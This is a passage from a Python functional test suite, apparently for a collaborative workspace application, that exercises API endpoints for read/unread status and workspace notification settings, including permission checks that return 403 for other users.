do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_unread(firstly_created)
api2.mark_unread(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# read
res = self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=admin.user_id,
),
status=403,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api_set_content_as_read__ok__200__admin_with_comments_read_content(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
comments = api.create_comment(workspace, firstly_created, "juste a super comment", True)
api.mark_unread(firstly_created)
api.mark_unread(comments)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# before
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=test_user.user_id,
)
)
# after
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
def test_api_set_content_as_read__ok__200__admin_with_comments_read_comment(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
comments = api.create_comment(workspace, firstly_created, "juste a super comment", True)
api.mark_read(firstly_created)
api.mark_unread(comments)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# before
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/read".format(
workspace_id=workspace.workspace_id,
content_id=comments.content_id,
user_id=test_user.user_id,
)
)
# after
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
class TestUserSetContentAsUnread(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread
"""
def test_api_set_content_as_unread__ok__200__admin(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_read(firstly_created)
api2.mark_read(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# before
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
# unread
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=test_user.user_id,
)
)
# after
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=admin.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
def test_api_set_content_as_unread__err__400__admin_workspace_do_not_exist(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_read(firstly_created)
api2.mark_read(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# unread
res = self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
workspace_id=4000, content_id=firstly_created.content_id, user_id=test_user.user_id
),
status=400,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.WORKSPACE_NOT_FOUND
def test_api_set_content_as_unread__err__400__admin_content_do_not_exist(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_read(firstly_created)
api2.mark_read(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
# unread
res = self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
workspace_id=workspace.workspace_id, content_id=4000, user_id=test_user.user_id
),
status=400,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.CONTENT_NOT_FOUND
def test_api_set_content_as_unread__ok__200__user_itself(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_read(firstly_created)
api2.mark_read(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# before
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
# unread
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=test_user.user_id,
)
)
# after
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
def test_api_set_content_as_unread__err__403__other_user(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_read(firstly_created)
api2.mark_read(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
# unread
res = self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=admin.user_id,
),
status=403,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
def test_api_set_content_as_unread__ok__200__with_comments_read_content(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
comments = api.create_comment(workspace, firstly_created, "juste a super comment", True)
api.mark_read(firstly_created)
api.mark_read(comments)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get(
"/api/v2/users/1/workspaces/{}/contents/read_status".format(workspace.workspace_id),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=admin.user_id,
)
)
res = self.testapp.get(
"/api/v2/users/1/workspaces/{}/contents/read_status".format(workspace.workspace_id),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
def test_api_set_content_as_unread__ok__200__with_comments_read_comment_only(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
comments = api.create_comment(workspace, firstly_created, "juste a super comment", True)
api.mark_read(firstly_created)
api.mark_read(comments)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get(
"/api/v2/users/1/workspaces/{}/contents/read_status".format(workspace.workspace_id),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/{content_id}/unread".format(
workspace_id=workspace.workspace_id,
content_id=comments.content_id,
user_id=admin.user_id,
)
)
res = self.testapp.get(
"/api/v2/users/1/workspaces/{}/contents/read_status".format(workspace.workspace_id),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
class TestUserSetWorkspaceAsRead(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/read
"""
def test_api_set_content_as_read__ok__200__admin(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_unread(main_folder)
api.mark_unread(firstly_created)
api2.mark_unread(main_folder)
api2.mark_unread(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
assert res.json_body[1]["content_id"] == main_folder.content_id
assert res.json_body[1]["read_by_user"] is False
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/read".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=test_user.user_id,
)
)
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
assert res.json_body[1]["content_id"] == main_folder.content_id
assert res.json_body[1]["read_by_user"] is True
def test_api_set_content_as_read__ok__200__user_itself(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_unread(main_folder)
api.mark_unread(firstly_created)
api2.mark_unread(main_folder)
api2.mark_unread(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is False
assert res.json_body[1]["content_id"] == main_folder.content_id
assert res.json_body[1]["read_by_user"] is False
self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/read".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=test_user.user_id,
)
)
res = self.testapp.get(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/contents/read_status".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=200,
)
assert res.json_body[0]["content_id"] == firstly_created.content_id
assert res.json_body[0]["read_by_user"] is True
assert res.json_body[1]["content_id"] == main_folder.content_id
assert res.json_body[1]["read_by_user"] is True
def test_api_set_content_as_read__err__403__other_user(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, False)
api = ContentApi(current_user=admin, session=dbsession, config=self.app_config)
api2 = ContentApi(current_user=test_user, session=dbsession, config=self.app_config)
main_folder = api.create(
content_type_list.Folder.slug, workspace, None, "this is randomized folder", "", True
)
# creation order test
firstly_created = api.create(
content_type_list.Page.slug, workspace, main_folder, "creation_order_test", "", True
)
api.mark_unread(main_folder)
api.mark_unread(firstly_created)
api2.mark_unread(main_folder)
api2.mark_unread(firstly_created)
dbsession.flush()
transaction.commit()
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
res = self.testapp.put(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/read".format(
workspace_id=workspace.workspace_id,
content_id=firstly_created.content_id,
user_id=admin.user_id,
),
status=403,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserEnableWorkspaceNotification(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/activate
"""
def test_api_enable_user_workspace_notification__ok__200__admin(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=False)
transaction.commit()
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is False
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
self.testapp.put_json(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/activate".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=204,
)
dbsession = get_tm_session(self.session_factory, transaction.manager)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is True
def test_api_enable_user_workspace_notification__ok__200__user_itself(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=False)
transaction.commit()
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is False
self.testapp.authorization = ("Basic", ("test@test.test", "password"))
self.testapp.put_json(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/activate".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=204,
)
dbsession = get_tm_session(self.session_factory, transaction.manager)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is True
def test_api_enable_user_workspace_notification__err__403__other_user(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
test_user2 = uapi.create_user(
email="test2@test2.test2",
password="password",
name="boby",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=False)
rapi.create_one(test_user2, workspace, UserRoleInWorkspace.READER, with_notif=False)
transaction.commit()
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is False
self.testapp.authorization = ("Basic", ("test2@test2.test2", "password"))
res = self.testapp.put_json(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/activate".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=403,
)
assert isinstance(res.json, dict)
assert "code" in res.json.keys()
assert res.json_body["code"] == ErrorCode.INSUFFICIENT_USER_PROFILE
class TestUserDisableWorkspaceNotification(FunctionalTest):
"""
Tests for /api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/deactivate
"""
def test_api_disable_user_workspace_notification__ok__200__admin(self):
# init DB
dbsession = get_tm_session(self.session_factory, transaction.manager)
admin = dbsession.query(User).filter(User.email == "admin@admin.admin").one()
workspace = WorkspaceApi(
current_user=admin, session=dbsession, config=self.app_config
).create_workspace("test workspace", save_now=True)
uapi = UserApi(current_user=admin, session=dbsession, config=self.app_config)
gapi = GroupApi(current_user=admin, session=dbsession, config=self.app_config)
groups = [gapi.get_one_with_name("users")]
test_user = uapi.create_user(
email="test@test.test",
password="password",
name="bob",
groups=groups,
timezone="Europe/Paris",
lang="fr",
do_save=True,
do_notify=False,
)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
rapi.create_one(test_user, workspace, UserRoleInWorkspace.READER, with_notif=True)
transaction.commit()
role = rapi.get_one(test_user.user_id, workspace.workspace_id)
assert role.do_notify is True
self.testapp.authorization = ("Basic", ("admin@admin.admin", "admin@admin.admin"))
self.testapp.put_json(
"/api/v2/users/{user_id}/workspaces/{workspace_id}/notifications/deactivate".format(
user_id=test_user.user_id, workspace_id=workspace.workspace_id
),
status=204,
)
dbsession = get_tm_session(self.session_factory, transaction.manager)
rapi = RoleApi(current_user=admin, session=dbsession, config=self.app_config)
